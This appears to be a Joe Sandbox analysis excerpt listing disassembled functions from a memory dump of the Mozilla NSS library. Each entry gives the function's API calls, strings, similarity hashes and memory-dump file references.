Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C898FE0,00000000), ref: 6C776E82

Part of subcall function 6C776AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C77B21D,00000000,00000000,6C77B219,?,6C776BFB,00000000,?,00000000,00000000,?,?,?,6C77B21D), ref: 6C776B01
Part of subcall function 6C776AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C776B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C776F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C776F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C898FE0,00000000), ref: 6C776F6B
PR_SetError.NSS3(FFFFE005,00000000,6C777D8F,?,?), ref: 6C776FE1

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: ceb873ad1b8a6cba2c5bfbc30416a6e34eb2e89637164e3023bc8a26a6daf788
Instruction ID: a76f8d816472f364106ef560005530a98d291cdb9ae01cbce10d179df4bf0630
Opcode Fuzzy Hash: ceb873ad1b8a6cba2c5bfbc30416a6e34eb2e89637164e3023bc8a26a6daf788
Instruction Fuzzy Hash: AE717071E1064A9FDB10CF55CE44BAABBA8FF54308F154229E808D7B15F770EA94CBA0

Function 6C7B0FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B1057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7B1085
PK11_GetAllTokens.NSS3 ref: 6C7B10B1
free.MOZGLUE(?), ref: 6C7B1107
PR_SetError.NSS3(00000000,00000000), ref: 6C7B1172
free.MOZGLUE(?), ref: 6C7B1182
free.MOZGLUE(?), ref: 6C7B11A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C7B11C5

Part of subcall function 6C7B52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C78EAC5,00000001), ref: 6C7B52DF
Part of subcall function 6C7B52C0: EnterCriticalSection.KERNEL32(?), ref: 6C7B52F3
Part of subcall function 6C7B52C0: PR_Unlock.NSS3(?), ref: 6C7B5358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7B11D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7B11F3

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: ca05a993eb323239df147db7037097239f6b9b1565d1b8bb926867165803a501
Instruction ID: f410fb59c18849ea512567f5fc8e6b9767277884fe42e4c65313e76b44abf7b1
Opcode Fuzzy Hash: ca05a993eb323239df147db7037097239f6b9b1565d1b8bb926867165803a501
Instruction Fuzzy Hash: 166193B4E013499BEB10DF68DA89BAEB7B5AF04348F144138EC19BB741E731E945CB91

Function 6C7BADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE10
EnterCriticalSection.KERNEL32(?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C79D079,00000000,00000001), ref: 6C7BAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE7F
TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEF1
free.MOZGLUE(6C79CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C79CDBB,?), ref: 6C7BAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAF30

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: c7eb1ceaf0e72d95042554202e78564e14487a9db68bbceaa298ec3d7586192b
Instruction ID: 9f2299460153541df95634fb5d97584b3b2ef870f968f80d0d6330e1e058bcfc
Opcode Fuzzy Hash: c7eb1ceaf0e72d95042554202e78564e14487a9db68bbceaa298ec3d7586192b
Instruction Fuzzy Hash: E3519FB5A00602AFDB11EF29D989B56B7B4FF04328F144675E808A7E11E731F964CBD1

Function 6C794CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C79AB7F,?,00000000,?), ref: 6C794CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C79AB7F,?,00000000,?), ref: 6C794CC8
TlsGetValue.KERNEL32(?,6C79AB7F,?,00000000,?), ref: 6C794CE0
EnterCriticalSection.KERNEL32(?,?,6C79AB7F,?,00000000,?), ref: 6C794CF4
PL_HashTableLookup.NSS3(?,?,?,6C79AB7F,?,00000000,?), ref: 6C794D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C794D10

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C794D26

Part of subcall function 6C839DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DC6
Part of subcall function 6C839DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DD1
Part of subcall function 6C839DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C839DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C794D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C794DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C794E02

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: db6ea02d13881ec8073b4277fad44fe13ba8c082fb748e7d07730171263d2567
Instruction ID: 874c13a10434f642dd3e9e18c86cfdab3286a84f55047005acddcac9b28df0ee
Opcode Fuzzy Hash: db6ea02d13881ec8073b4277fad44fe13ba8c082fb748e7d07730171263d2567
Instruction Fuzzy Hash: 8A41E7B9A00101ABEB119F28FE49A6677B8BF1621DF044170ED19C7B22FB31D924C7E1

Function 6C77BFF0 Relevance: 15.1, APIs: 10, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C77BFFB

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6C77C015

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6C77C032
DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6C77C04D

Part of subcall function 6C7C69E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C7C6A47
Part of subcall function 6C7C69E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6C7C6A64

DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6C77C064
CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6C77C07B

Part of subcall function 6C778980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C777310), ref: 6C7789B8
Part of subcall function 6C778980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C777310), ref: 6C7789E6
Part of subcall function 6C778980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C778A00
Part of subcall function 6C778980: CERT_CopyRDN.NSS3(00000004,00000000,6C777310,?,?,00000004,?), ref: 6C778A1B
Part of subcall function 6C778980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C778A74

Part of subcall function 6C771D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6C77C097,00000000,000000B0,?), ref: 6C771D2C
Part of subcall function 6C771D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6C77C09B,00000000,00000000,00000000,?,6C77C097,00000000,000000B0,?), ref: 6C771D3F
Part of subcall function 6C771D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6C77C087,00000000,000000B0,?), ref: 6C771D54

CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6C77C0AD
SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6C77C0C9

Part of subcall function 6C782DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6C77C0D2,6C77C0CE,00000000,-000000D4,?), ref: 6C782DF5
Part of subcall function 6C782DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6C77C0CE,00000000,-000000D4,?), ref: 6C782E27

CERT_DestroyCertificate.NSS3(00000000), ref: 6C77C0D6
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C77C0E3

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
String ID:
API String ID: 3955726912-0
Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction ID: 9bdddd03d0053be4ad8b6c730e4c17593cb47316e149b68f571f5db954e8c4c3
Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction Fuzzy Hash: C821B5E66401092BFF206A61AE8DFFB36AC9B0575DF080134FD04D9646FB22D518C3B2

Function 6C772E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C772CDA,?,00000000), ref: 6C772E1E

Part of subcall function 6C7CFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C779003,?), ref: 6C7CFD91
Part of subcall function 6C7CFD80: PORT_Alloc_Util.NSS3(A4686C7D,?), ref: 6C7CFDA2
Part of subcall function 6C7CFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C7D,?,?), ref: 6C7CFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C772E33

Part of subcall function 6C7CFD80: free.MOZGLUE(00000000,?,?), ref: 6C7CFDD1

TlsGetValue.KERNEL32 ref: 6C772E4E
EnterCriticalSection.KERNEL32(?), ref: 6C772E5E
PL_HashTableLookup.NSS3(?), ref: 6C772E71
PL_HashTableRemove.NSS3(?), ref: 6C772E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C772E96
PR_Unlock.NSS3 ref: 6C772EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C772EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C772EC5

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 7bab4410470cbaa171719266419529daaa244b9961cd1003c7e2b9dab6ba6cb9
Instruction ID: bfb03e5483728df5e84fe9ea5d53cb48ad9dd76491ff9dd245375c0d38318d85
Opcode Fuzzy Hash: 7bab4410470cbaa171719266419529daaa244b9961cd1003c7e2b9dab6ba6cb9
Instruction Fuzzy Hash: 2821DA76A40105ABDF211B29ED0DA9B3B79DB5235DF040530ED2886B11FB32D958D7E1

Function 6C75FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C75FD18
sqlite3_initialize.NSS3 ref: 6C75FD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C75FD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C75FD99
sqlite3_free.NSS3(00000000), ref: 6C75FE3C
sqlite3_free.NSS3(?), ref: 6C75FEE3
sqlite3_free.NSS3(?), ref: 6C75FEEE

Strings

simple, xrefs: 6C75FC79

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: 8b517a642c66629bb2686aa66b1538d2d271da59d633911b6ce68753ca663b72
Instruction ID: d188716dd19bb7cc790deea7bd01b0e45e776c1379072dd572aa37acc01a5d1c
Opcode Fuzzy Hash: 8b517a642c66629bb2686aa66b1538d2d271da59d633911b6ce68753ca663b72
Instruction Fuzzy Hash: 659173B0B012058FDB04CF55CA84BAAB7B6FF85318F64C56CD9199BB52DB31E861CB90

Function 6C765CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C765EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C765EED

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C765ED1
invalid, xrefs: 6C765EBE
unable to close due to unfinalized statements or unfinished backups, xrefs: 6C765E64
API call with %s database connection pointer, xrefs: 6C765EC3
%s at line %d of [%.10s], xrefs: 6C765EE0
misuse, xrefs: 6C765EDB

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: 95d5fccf18f07633afeb13bc01c8c4ae32a8e7117460c3c754428f276b0cc96c
Instruction ID: 962c92503b469640cfc096a451e61ed831d01ba97493101b0a466a9f0b336ca3
Opcode Fuzzy Hash: 95d5fccf18f07633afeb13bc01c8c4ae32a8e7117460c3c754428f276b0cc96c
Instruction Fuzzy Hash: B081D130B056019BEB598F16EA89BAA7770BF4130CF184678DC155BF82C730E802EBD1

Function 6C74DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C74DDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C74DE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C74DE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C74DEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C74DF78

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C74DE52, 6C74DE81
database corruption, xrefs: 6C74DE5C, 6C74DE8B
%s at line %d of [%.10s], xrefs: 6C74DE61, 6C74DE90

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: 5f09a9baa6b6a1d995231d19b33ddde78c2878a21d468eb604956e9e65795545
Instruction ID: 7f45fd6df23950646e17e3edede91520784a5a303e4bfc13f6c3892b686d42ea
Opcode Fuzzy Hash: 5f09a9baa6b6a1d995231d19b33ddde78c2878a21d468eb604956e9e65795545
Instruction Fuzzy Hash: B681F2706043009FD714CF25CA85B6A77F1AFA5308F14C87DE89A8BB92E731E845CB96

Function 6C6FCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C6FB999), ref: 6C6FCFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C6FB999), ref: 6C6FD02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C6FB999), ref: 6C6FD041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C6FB999), ref: 6C84972B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6FCFDD, 6C6FD00E, 6C6FD022, 6C6FD033, 6C849780
database corruption, xrefs: 6C6FCFE7, 6C6FD013, 6C6FD028, 6C6FD039, 6C6FD03E, 6C849786
%s at line %d of [%.10s], xrefs: 6C6FCFEC, 6C6FD018, 6C6FD029, 6C6FD03F, 6C84978B

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 8ed74df995b9505b982a0549f9d737b15d53fe2b27b24695b1540a075585082a
Instruction ID: 8612ea26ec92815aa88e2bf40e9117e24bbc8ffc65210eaf6d86fca07bc4858f
Opcode Fuzzy Hash: 8ed74df995b9505b982a0549f9d737b15d53fe2b27b24695b1540a075585082a
Instruction Fuzzy Hash: AA616A71A002149BD330CF29C940BA6B7F6EF95318F1885ADE4499FB42D376E947C7A1

Function 6C7FFFF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C805B40: PR_GetIdentitiesLayer.NSS3 ref: 6C805B56

PK11_FreeSymKey.NSS3(00000000), ref: 6C800113
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C800130
PORT_Alloc_Util.NSS3(00000040), ref: 6C80015D
memcpy.VCRUNTIME140(-00000042,?,?), ref: 6C8001AF
PR_SetError.NSS3(FFFFD056,00000000), ref: 6C800202
free.MOZGLUE(?), ref: 6C800224
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C800253

Strings

exporter, xrefs: 6C8000F7

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
